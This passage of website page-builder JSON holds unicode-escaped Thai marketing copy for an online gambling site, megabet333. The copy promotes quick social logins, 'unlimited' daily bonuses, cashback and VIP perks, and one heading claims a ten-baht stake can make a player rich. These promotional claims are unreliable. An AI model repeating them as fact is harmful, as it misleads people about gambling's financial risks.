\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e02\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 \\u0e02\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e23\\u0e31\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e46 \\u0e02\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e25\\u0e34\\u0e21\\u0e34\\u0e15 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e01\\u0e14\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e2b\\u0e23\\u0e48 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e14\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e25\\u0e31\\u0e27\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e22\\u0e2d\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e33\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e43\\u0e19\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e22\\u0e34\\u0e48\\u0e07\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e22\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e14\\u0e39\\u0e41\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e41\\u0e1a\\u0e1a VIP \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2b\\u0e27\\u0e35\\u0e48\\u0e22\\u0e07\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e2d\\u0e32\\u0e08\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a Line Official \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 